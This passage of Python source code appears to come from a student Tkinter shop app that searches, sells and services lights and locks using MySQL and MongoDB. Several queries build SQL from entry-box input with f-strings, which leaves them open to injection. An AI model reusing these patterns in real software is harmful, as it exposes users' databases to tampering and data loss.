safe3Var.get(),\n smartHome1Var.get(),\n ]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\n \"$or\": [\n {\"Model\": models[0]},\n {\"Model\": models[1]},\n {\"Model\": models[2]},\n {\"Model\": models[3]},\n {\"Model\": models[4]},\n {\"Model\": models[5]},\n ]\n }\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n\n createTable(sql, selectedPrice)\n\n else:\n messagebox.askokcancel(\"Search Error\", \"No such product\")\n\n def createTable(items, selectedPrice):\n allItems = []\n global listFrame\n listFrame.destroy()\n listFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n sql = \"\"\n categoryValues = []\n modelValues = []\n categoryModel = [\n \"LightsLight1\",\n \"LightsLight2\",\n \"LightsSmartHome1\",\n \"LocksSafe1\",\n \"LocksSafe2\",\n \"LocksSafe3\",\n \"LocksSmartHome1\",\n ]\n instockValues = [0, 0, 0, 0, 0, 0, 0]\n totalStocks = [0, 0, 0, 0, 0, 0, 0]\n\n for item in items:\n allItems.append(item)\n index = 0\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n\n index = categoryModel.index(categoryModelPair)\n\n if item[\"Category\"] not in categoryValues:\n categoryValues.append(item[\"Category\"])\n if item[\"Model\"] not in modelValues:\n modelValues.append(item[\"Model\"])\n # count every item exactly once, whether or not its model was already seen\n totalStocks[index] = totalStocks[index] + 1\n if item[\"PurchaseStatus\"] == \"Unsold\":\n instockValues[index] = instockValues[index] + 1\n\n # Test if there is a value in category and model\n oneCat = False\n # Test if there are 2 categories, i.e. the user never selected a category\n twoCat = False\n try:\n numCat = len(categoryValues)\n if numCat == 2:\n twoCat = True\n oneCat = True\n except:\n print(\"No value on either category or model\")\n print(len(categoryValues))\n print(len(modelValues))\n\n if twoCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": 
[\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n elif oneCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n columnNames = (\n \"Category\",\n \"Model\",\n \"Price ($)\",\n \"Warranty (months)\",\n \"In Stock\",\n \"Cost\",\n \"Items Sold\")\n table = ttk.Treeview(listFrame, column=columnNames, show=\"headings\", height=10)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n table.column(name, anchor=CENTER, stretch=NO, width=150)\n\n for item in sql:\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n toInsert = (\n item[\"Category\"],\n item[\"Model\"],\n item[\"Price ($)\"],\n item[\"Warranty (months)\"],\n instockValues[categoryModel.index(categoryModelPair)],\n item[\"Cost ($)\"],\n totalStocks[categoryModel.index(categoryModelPair)]\n - instockValues[categoryModel.index(categoryModelPair)],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n table.place(relwidth=1, relheight=1)\n listFrame.place(relwidth=0.7, relheight=0.9, relx=0.3, rely=0.1)\n\n # Binding Click\n def clicking(e):\n selected = table.focus()\n # read the selected row's cells by their column names\n theModel = table.set(selected, 'Model')\n theCategory = table.set(selected, 'Category')\n\n adminProductPage.destroy()\n adminItemPage(person, allItems, [theModel, theCategory])\n\n # Binding. NOTE: the event string was lost in extraction; \"<Double-1>\" is assumed to match the \"Double Click a row\" instruction label.\n table.bind(\"<Double-1>\", clicking)\n\n\n def goHome():\n adminProductPage.destroy()\n adminHome(person)\n\n def resetDB():\n # SQL\n try:\n dbCursor = connection.cursor()\n sql = \"DROP DATABASE \" + \"oshes\"\n dbCursor.execute(sql)\n databaseCollection = dbCursor.fetchall()\n\n except Exception as e:\n print(\"Exception occurred: {}\".format(e))\n\n reimportDB()\n prepopulate_all()\n\n # MongoDB\n collectionItem.delete_many({})\n with open('items.json') as f:\n file_data = json.load(f)\n collectionItem.insert_many(file_data)\n\n collectionProduct.delete_many({})\n with open('products.json') as f:\n file_data2 = json.load(f)\n collectionProduct.insert_many(file_data2)\n setOld()\n root.destroy()\n\n # Combobox\n example = ttk.Combobox(searchFrame, values=[\"Search by...\", \"Category\", \"Model\"])\n example.current(0)\n example.place(relx=0.05, rely=0.70)\n\n priceValues = [\"\", \"50\", \"70\", \"100\", \"120\", \"200\"]\n priceField = ttk.Combobox(filterFrame, values=priceValues)\n priceField.place(relx=0.5, rely=0.2)\n\n colourValues = []\n colourValues.append(\"\")\n factoryValues = []\n factoryValues.append(\"\")\n yearValues = []\n yearValues.append(\"\")\n all = collectionItem.find()\n\n for item in all:\n if item[\"Color\"] not in colourValues:\n colourValues.append(item[\"Color\"])\n if item[\"Factory\"] not in factoryValues:\n factoryValues.append(item[\"Factory\"])\n if item[\"ProductionYear\"] not in yearValues:\n yearValues.append(item[\"ProductionYear\"])\n colourBox = ttk.Combobox(filterFrame, values=colourValues)\n factoryBox = ttk.Combobox(filterFrame, values=factoryValues)\n yearBox = 
ttk.Combobox(filterFrame, values=yearValues)\n\n colourBox.place(relx=0.5, rely=0.4)\n factoryBox.place(relx=0.5, rely=0.6)\n yearBox.place(relx=0.5, rely=0.8)\n\n # Checkboxes for Category\n lightVar = StringVar()\n locksVar = StringVar()\n\n lightBox = Checkbutton(\n categoryFrame, text=\"Lights\", variable=lightVar, onvalue=\"Lights\", offvalue=\"\"\n )\n locksBox = Checkbutton(\n categoryFrame, text=\"Locks\", variable=locksVar, onvalue=\"Locks\", offvalue=\"\"\n )\n\n lightBox.place(relx=0.1, rely=0.4)\n locksBox.place(relx=0.5, rely=0.4)\n\n # Checkboxes for Models\n light1Var = StringVar()\n light2Var = StringVar()\n safe1Var = StringVar()\n safe2Var = StringVar()\n safe3Var = StringVar()\n smartHome1Var = StringVar()\n\n light1Box = Checkbutton(\n modelFrame, text=\"Light 1\", variable=light1Var, onvalue=\"Light1\", offvalue=\"\"\n )\n light2Box = Checkbutton(\n modelFrame, text=\"Light 2\", variable=light2Var, onvalue=\"Light2\", offvalue=\"\"\n )\n safe1Box = Checkbutton(\n modelFrame, text=\"Safe 1\", variable=safe1Var, onvalue=\"Safe1\", offvalue=\"\"\n )\n safe2Box = Checkbutton(\n modelFrame, text=\"Safe 2\", variable=safe2Var, onvalue=\"Safe2\", offvalue=\"\"\n )\n safe3Box = Checkbutton(\n modelFrame, text=\"Safe 3\", variable=safe3Var, onvalue=\"Safe3\", offvalue=\"\"\n )\n smartHome1Box = Checkbutton(\n modelFrame,\n text=\"Smart Home 1\",\n variable=smartHome1Var,\n onvalue=\"SmartHome1\",\n offvalue=\"\",\n )\n\n light1Box.place(relx=0.1, rely=0.35)\n light2Box.place(relx=0.4, rely=0.35)\n safe1Box.place(relx=0.7, rely=0.35)\n safe2Box.place(relx=0.1, rely=0.6)\n safe3Box.place(relx=0.4, rely=0.6)\n smartHome1Box.place(relx=0.7, rely=0.6)\n\n # Buttons\n searchButton = Button(\n searchFrame,\n text=\"Search\",\n width=10,\n height=1,\n command=lambda: searchTings(),\n bg=\"green\",\n )\n\n homeButton = Button(\n searchFrame, text=\"Return to Home\", width=30, command=goHome, bg=\"red\"\n )\n searchButton.place(relx=0.75, rely=0.7)\n homeButton.place(relx=0.2, rely=0.9)\n dataResetButton = Button(\n searchFrame, text=\"Reset database\", width=30, bg=\"red\", command=resetDB\n )\n dataResetButton.place(relx=0.2, rely=0.8)\n\n # Initialise\n adminProductPage.place(relwidth=1, relheight=1)\n searchFrame.place(relwidth=0.3, relheight=0.95, relx=0, rely=0.05)\n listFrame.place(relwidth=0.7, relheight=0.9, relx=0.3, rely=0.1)\n categoryFrame.place(rely = 0.2, relx= 0.05, relwidth = 0.9, relheight = 0.1)\n modelFrame.place(rely = 0.35, relx=0.05, relwidth=0.9, relheight=0.25)\n filterFrame.place(relx = 0.05, rely = 0.02, relwidth = 0.9, relheight = 0.15)\n\n\n#################################################################################\n# 4. 
Item Information\n#################################################################################\ndef goToItem(person, id, admin=False):\n\n # Functions\n def getItemInfo(itemID):\n item = collectionItem.find({\"ItemID\": {\"$eq\": itemID}})\n item = item[0]\n return (\n item[\"Category\"],\n item[\"Color\"],\n item[\"Factory\"],\n item[\"PowerSupply\"],\n item[\"PurchaseStatus\"],\n item[\"ProductionYear\"],\n item[\"Model\"],\n item[\"ServiceStatus\"],\n )\n\n def getProductInfo(category, model):\n product = collectionProduct.find(\n {\"$and\": [{\"Category\": {\"$eq\": category}}, {\"Model\": {\"$eq\": model}}]}\n )\n product = product[0]\n return (\n product[\"Cost ($)\"],\n product[\"Price ($)\"],\n product[\"Warranty (months)\"],\n product[\"ProductID\"],\n )\n\n def getSimilarItems(category, model, admin):\n\n items = collectionItem.find(\n {\n \"$and\": [\n {\"Category\": {\"$eq\": category}},\n {\"Model\": {\"$eq\": model}},\n {\"PurchaseStatus\": {\"$eq\": \"Unsold\"}} if not admin else {},\n ]\n },\n {\n \"ItemID\": 1,\n \"Color\": 1,\n \"Factory\": 1,\n \"PowerSupply\": 1,\n \"ProductionYear\": 1,\n \"PurchaseStatus\": 1,\n },\n )\n\n return items\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n attrEntry5.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearEntries()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n attrEntry5.insert(0, attrs[5])\n\n def goItem():\n try:\n itemID = str(attrEntry0.get())\n itemPage.destroy()\n goToItem(person, itemID, admin)\n except:\n goToItem(person, id, admin)\n messagebox.askokcancel(title=\"Error\", message=\"Invalid Item ID\")\n\n def buyItem():\n # UPDATES MYSQL\n numQuery = \"SELECT MAX(purchaseID) FROM Purchase\"\n if readQuery(connection, numQuery)[0][0] != None:\n purchaseID = str(int(readQuery(connection, numQuery)[0][0]) + 1)\n else:\n purchaseID = 0\n purchaseDate = datetime.now().strftime(\"%Y-%m-%d\")\n sql_query = \"INSERT INTO Purchase VALUES ('%s', '%s','%s'); \" % (\n purchaseID,\n purchaseDate,\n person_id,\n )\n executeQuery(connection, sql_query)\n temp = collectionItem.find_one({ \"ItemID\": id })\n productID = collectionProduct.find_one({\"Model\":temp[\"Model\"], \"Category\":temp[\"Category\"]})[\"ProductID\"]\n sql_query = \"INSERT INTO Item VALUES ('%s', '%s','%s', '%s', '%s','%s', '%s', %s, %s); \" % (\n id,\n color,\n factory,\n power_supply,\n production_year,\n model,\n service_status,\n productID,\n purchaseID,\n )\n executeQuery(connection, sql_query)\n\n # UPDATES MONGODB\n collectionItem.find_one_and_update(\n {\"ItemID\": id}, {\"$set\": {\"PurchaseStatus\": \"Sold\"}}\n )\n\n goToItem(person, id, admin)\n\n return messagebox.showinfo(title=\"success\", message=\"Update successful!\")\n\n def goHome():\n itemPage.destroy()\n if admin:\n adminHome(person)\n else:\n userHome(person)\n\n def refresh():\n itemPage.destroy()\n goToItem(person, id, admin)\n \n def back():\n itemPage.destroy()\n if admin:\n adminProducts(person)\n else:\n userProducts(person)\n\n def backMainte():\n itemPage.destroy()\n if admin:\n serviceManagement(person)\n else:\n requestManagement(person)\n\n person_id = person[0]\n (\n category,\n color,\n factory,\n power_supply,\n 
purchase_status,\n production_year,\n model,\n service_status,\n ) = getItemInfo(id)\n\n \n cost, price, warranty, productId = getProductInfo(category, model)\n\n # Frames\n itemPage = Frame(root)\n outerFrame1 = Frame(itemPage, bg=\"blue\")\n outerFrame2 = Frame(itemPage, bg=\"yellow\")\n outerTableFrame = Frame(outerFrame2)\n\n Frame1 = Frame(outerFrame1)\n Frame2 = Frame(outerFrame1)\n\n tableFrame = Frame(outerTableFrame)\n selectionFrame = LabelFrame(outerTableFrame, text=\"Record\")\n goItemFrame = Frame(outerFrame2)\n\n keyInfoFrame = Frame(Frame1, highlightbackground=\"black\", highlightthickness=1)\n\n purchaseFrame = Frame(Frame1, highlightbackground=\"black\", highlightthickness=1)\n\n infoFrame = LabelFrame(\n Frame2,\n text=f\"Item Information\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n buttonsFrame = Frame(\n outerFrame1,\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n bannerLabel = Label(\n itemPage,\n text=f\"Item #{id} : {category} / {model}\",\n bg=\"lightblue\",\n relief=SUNKEN,\n height=2,\n )\n \n if admin:\n bannerLabel = Label(\n itemPage,\n text=f\"Item #{id} : {category} / {model}\",\n bg=\"violet\",\n relief=SUNKEN,\n height=2,\n )\n\n similarItemsBannerLabel = Label(\n tableFrame,\n text=f\"Similar Items ({category} : {model})\",\n bg=\"yellow\",\n relief=SUNKEN,\n height=2,\n )\n\n idLabel = Label(keyInfoFrame, text=f\"Item ID:\", bg=\"lightblue\")\n categoryLabel = Label(keyInfoFrame, text=f\"Category:\", bg=\"lightblue\")\n modelLabel = Label(keyInfoFrame, text=f\"Model:\", bg=\"lightblue\")\n\n colorLabel = Label(infoFrame, text=f\"Color:\", bg=\"lightblue\")\n factoryLabel = Label(infoFrame, text=f\"Factory:\", bg=\"lightblue\")\n powerSupplyLabel = Label(infoFrame, text=f\"Power Supply:\", bg=\"lightblue\")\n\n productionYearLabel = Label(infoFrame, text=f\"Production Year:\", bg=\"lightblue\")\n\n warrantyLabel = Label(infoFrame, text=f\"Warranty:\", bg=\"lightblue\")\n\n if admin:\n costLabel = Label(infoFrame, text=f\"Cost:\", bg=\"lightblue\")\n\n serviceStatusLabel = Label(infoFrame, text=f\"Service Status:\", bg=\"lightblue\")\n\n # Table\n similarItems = getSimilarItems(category, model, admin)\n columnNames = (\n \"ID\",\n \"Color\",\n \"Factory\",\n \"Power Supply\",\n \"Production Year\",\n \"Purchase Status\",\n )\n tableScroll = Scrollbar(tableFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n tableFrame,\n yscrollcommand=tableScroll.set,\n columns=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n tableScroll.config(command=table.yview)\n col_width = table.winfo_width() // 6\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n table.column(name, width=col_width)\n for item in similarItems:\n toInsert = (\n item[\"ItemID\"],\n item[\"Color\"],\n item[\"Factory\"],\n item[\"PowerSupply\"],\n item[\"ProductionYear\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n # Event. NOTE: the event string was lost in extraction; \"<ButtonRelease-1>\" is assumed (click a row to load it into the entry boxes).\n table.bind(\"<ButtonRelease-1>\", select_record)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Color\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Factory\")\n attrLabel2.grid(row=0, 
column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Power Supply\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Production Year\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n attrLabel5 = Label(selectionFrame, text=\"Purchase Status\")\n attrLabel5.grid(row=1, column=4, padx=10, pady=10)\n attrEntry5 = Entry(selectionFrame)\n attrEntry5.grid(row=1, column=5, padx=10, pady=10)\n\n # Fields\n idValue = Label(keyInfoFrame, text=f\"{id}\", bg=\"lightblue\")\n categoryValue = Label(keyInfoFrame, text=f\"{category}\", bg=\"lightblue\")\n modelValue = Label(keyInfoFrame, text=f\"{model}\", bg=\"lightblue\")\n\n colorValue = Label(infoFrame, text=f\"{color}\", bg=\"lightblue\")\n factoryValue = Label(infoFrame, text=f\"{factory}\", bg=\"lightblue\")\n powerSupplyValue = Label(infoFrame, text=f\"{power_supply}\", bg=\"lightblue\")\n\n productionYearValue = Label(infoFrame, text=f\"{production_year}\", bg=\"lightblue\")\n\n warrantyValue = Label(infoFrame, text=f\"{warranty} month(s)\", bg=\"lightblue\")\n\n if admin:\n costValue = Label(infoFrame, text=f\"${cost}\", bg=\"lightblue\")\n serviceStatusText = 'N/A' if service_status == \"\" else service_status\n\n serviceStatusValue = Label(infoFrame, text=f\"{serviceStatusText}\", bg=\"lightblue\")\n\n # Buttons\n if not admin and purchase_status == \"Unsold\":\n buyButton = Button(\n purchaseFrame,\n text=f\"Buy (${price})\",\n command=buyItem,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n elif purchase_status == \"Unsold\":\n buyButton = Button(\n purchaseFrame,\n text=f\"Unsold (${price})\",\n state=DISABLED,\n bg=\"orange\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n else: # sold\n buyButton = Button(\n purchaseFrame,\n text=f\"Sold (${price})\",\n state=DISABLED,\n bg=\"red\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n homeButton = Button(\n buttonsFrame,\n text=\"Home\",\n command=goHome,\n bg=\"blue\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n refreshButton = Button(\n buttonsFrame,\n text=\"Refresh\",\n command=refresh,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n\n goItemButton = Button(\n goItemFrame,\n text=\"Go to Item\",\n command=goItem,\n bg=\"green\",\n font=(None, 16),\n fg=\"#ffffff\",\n )\n \n backButton = Button(\n outerFrame1,\n text=\"Products Page\",\n command=back, bg=\"white\",\n font=12\n )\n\n maintenanceButton = Button(\n outerFrame1,\n text=\"Maintenance Page\",\n command=backMainte, bg=\"white\",\n font=12\n )\n\n # Initialise\n itemPage.place(relwidth=1, relheight=1)\n outerFrame1.place(relx=0, rely=0.05, relwidth=0.4, relheight=0.95)\n outerFrame2.place(relx=0.4, rely=0.05, relwidth=0.6, relheight=0.95)\n\n bannerLabel.place(relheight=0.05, relwidth=1)\n Frame1.place(relx=0.05, rely=0.5, anchor=W)\n Frame2.place(relx=0.95, rely=0.5, anchor=E)\n\n outerTableFrame.pack(fill=\"x\")\n tableFrame.pack(fill=\"x\")\n selectionFrame.pack(fill=\"x\", expand=\"yes\")\n goItemFrame.pack(fill=\"y\", pady=20)\n\n maintenanceButton.place(relx = 0.5, rely = 0.85)\n backButton.place(relx = 0.5, rely = 0.9)\n buttonsFrame.place(relx=0.05, rely=0.95, anchor=SW)\n homeButton.grid(row=0, column=0, padx=10, pady=10)\n refreshButton.grid(row=0, column=1, 
padx=(0, 10), pady=10)\n goItemButton.pack()\n keyInfoFrame.pack(fill=X)\n purchaseFrame.pack(fill=X)\n infoFrame.pack(fill=BOTH)\n similarItemsBannerLabel.pack(fill=\"x\")\n table.pack(fill=\"x\")\n\n idLabel.grid(row=0, column=0, sticky=W, padx=20, pady=20)\n idValue.grid(row=0, column=1, padx=20, pady=20)\n categoryLabel.grid(row=1, column=0, sticky=W, padx=20, pady=(0, 20))\n categoryValue.grid(row=1, column=1, padx=20, pady=(0, 20))\n modelLabel.grid(row=2, column=0, sticky=W, padx=20, pady=(0, 20))\n modelValue.grid(row=2, column=1, padx=20, pady=20)\n idLabel.grid(row=0, column=0, sticky=W)\n\n colorLabel.grid(row=0, column=0, sticky=W, padx=20, pady=10)\n colorValue.grid(row=0, column=1, padx=20, pady=10)\n factoryLabel.grid(row=1, column=0, sticky=W, padx=20, pady=10)\n factoryValue.grid(row=1, column=1, padx=20, pady=10)\n powerSupplyLabel.grid(row=2, column=0, sticky=W, padx=20, pady=10)\n powerSupplyValue.grid(row=2, column=1, padx=20, pady=10)\n productionYearLabel.grid(row=3, column=0, sticky=W, padx=20, pady=10)\n productionYearValue.grid(row=3, column=1, padx=20, pady=10)\n warrantyLabel.grid(row=4, column=0, sticky=W, padx=20, pady=10)\n warrantyValue.grid(row=4, column=1, padx=20, pady=10)\n\n if admin:\n costLabel.grid(row=5, column=0, sticky=W, padx=20, pady=10)\n costValue.grid(row=5, column=1, padx=20, pady=10)\n serviceStatusLabel.grid(row=6, column=0, sticky=W, padx=20, pady=10)\n serviceStatusValue.grid(row=6, column=1, padx=20, pady=10)\n\n buyButton.pack(fill=X, padx=10, pady=10)\n\n\n#################################################################################\n# 5. Request Management Page (User)\n#################################################################################\ndef requestManagement(person):\n global requestListFrame\n\n # Frames\n requestPage = Frame(root)\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n selectionFrame = LabelFrame(requestPage, text=\"Record\")\n buttonsFrame = LabelFrame(\n requestPage,\n text=\"Options\",\n highlightbackground=\"black\",\n highlightthickness=1,\n bg=\"grey\",\n )\n requestFormFrame = LabelFrame(\n requestPage,\n text=\"New Request\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n requestLabel = Label(\n requestPage, text=f\"Request Management\", bg=\"lightblue\", relief=SUNKEN\n )\n\n requestLabel.place(relwidth = 1, relheight = 0.05)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Fee ($)\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Date\")\n attrLabel2.grid(row=0, column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Status\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Item ID\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n formLabel0 = Label(requestFormFrame, text=\"Item ID\")\n formLabel0.grid(row=0, column=0, 
padx=10, pady=10)\n formEntry0 = Entry(requestFormFrame)\n formEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n # Variables\n userID = person[0]\n\n # Helpers\n\n def displayTable():\n requests = getUserRequests(userID)\n createTable(requests)\n\n def createTable(requests):\n global requestListFrame\n requestListFrame.destroy()\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestListFrame.place(relx = 0.05, rely = 0.4, relwidth = 0.9, relheight = 0.55)\n\n columnNames = (\"ID\", \"Fee ($)\", \"Date\", \"Status\", \"Item ID\")\n tableScroll = Scrollbar(requestListFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n requestListFrame,\n yscrollcommand=tableScroll.set,\n column=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n table.place(relwidth = 1, relheight = 1)\n tableScroll.config(command=table.yview)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n if requests:\n for r in requests:\n toInsert = (r[0], r[1], r[2], r[3], int(r[4]))\n table.insert(\"\", \"end\", text=str(r), values=toInsert)\n\n # Function\n def select_record(e):\n # delete current entry boxes\n clearEntries()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n # Event. NOTE: the event string was lost in extraction; \"<ButtonRelease-1>\" is assumed (click a row to load it into the entry boxes).\n table.bind(\"<ButtonRelease-1>\", select_record)\n\n def goHome():\n requestPage.destroy()\n userHome(person)\n\n def getUserRequests(userID):\n query_string = f\"SELECT requestID, requestFee, requestDate, requestStatus, itemID FROM Request WHERE customerID = {userID}\"\n return readQuery(connection, query_string)\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n\n def makePayment():\n try:\n requestID = attrEntry0.get()\n requestFee = attrEntry1.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus == \"Submitted and Waiting for payment\" and float(requestFee) > 0:\n response = messagebox.askokcancel(\"Request payment\",\n message=f\"Request Fee: ${requestFee}. 
Proceed to payment?\"\n )\n if response:\n date_attr = date.today().strftime('%Y-%m-%d')\n query_string_1 = f\"INSERT INTO Payment VALUES({requestID},'{date_attr}',requestFee)\"\n\n query_string_2 = f\"UPDATE Request SET requestStatus='In progress' WHERE requestID = {requestID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"Waiting for approval\"}\n })\n \n clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(title=\"Error\", message=\"Payment not needed\")\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def cancelRequest():\n try:\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus != \"Approved\" and requestStatus != \"Canceled\":\n response = messagebox.askokcancel(\n \"Cancel Request\",\n message=f\"Are you sure you want to cancel request '{requestID}'?\",\n )\n\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Canceled' WHERE requestID = {requestID}\"\n executeQuery(connection, query_string_1)\n\n query_string_2 = f\"UPDATE Item SET serviceStatus='' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"\"}\n })\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be canceled\"\n )\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def viewItem():\n itemID = attrEntry4.get()\n return goToItem(person,itemID)\n\n def getRequestItemID():\n try:\n itemID = formEntry0.get()\n return itemID\n except:\n return messagebox.showerror(\n title=\"Error\", message=\"Invalid input/data type\"\n )\n\n def submitForm():\n itemID = getRequestItemID()\n requestForm(itemID, person)\n displayTable()\n \n\n # Buttons\n displayButton = Button(\n buttonsFrame, text=\"Refresh Table\", command=displayTable, bg=\"white\"\n )\n displayButton.grid(row=0, column=0, padx=10, pady=10)\n\n homeButton = Button(buttonsFrame, text=\"Return to Home\", command=goHome, bg=\"blue\")\n homeButton.grid(row=0, column=1, padx=10, pady=10)\n\n viewItemButton = Button(buttonsFrame, text=\"View Item\", command=viewItem, bg=\"blue\")\n viewItemButton.grid(row=0, column=2, padx=10, pady=10)\n\n clearEntryButton = Button(\n buttonsFrame, text=\"Clear Entry\", command=clearEntries, bg=\"blue\"\n )\n clearEntryButton.grid(row=0, column=3, padx=10, pady=10)\n\n cancelRequestButton = Button(\n buttonsFrame, text=\"Cancel request\", command=cancelRequest, bg=\"red\"\n )\n cancelRequestButton.grid(row=0, column=4, padx=10, pady=10)\n\n requestPaymentButton = Button(\n buttonsFrame, text=\"Make Payment\", command=makePayment, bg=\"green\"\n )\n requestPaymentButton.grid(row=0, column=5, padx=10, pady=10)\n\n requestFormSubmitButton = Button(\n requestFormFrame, text=\"Submit\", command=submitForm, bg=\"green\"\n )\n requestFormSubmitButton.grid(row=0, column=2, padx=10, pady=10)\n\n # Inventory Table\n def getInventoryRow(purchaseID):\n query = f\"SELECT itemID, productID FROM Item WHERE purchaseID = {purchaseID}\"\n res = readQuery(connection, query)[0]\n itemID, productID = int(res[0]),int(res[1])\n query_1 = f\"SELECT category, model FROM Product WHERE productID = {productID}\"\n res_1 = readQuery(connection, 
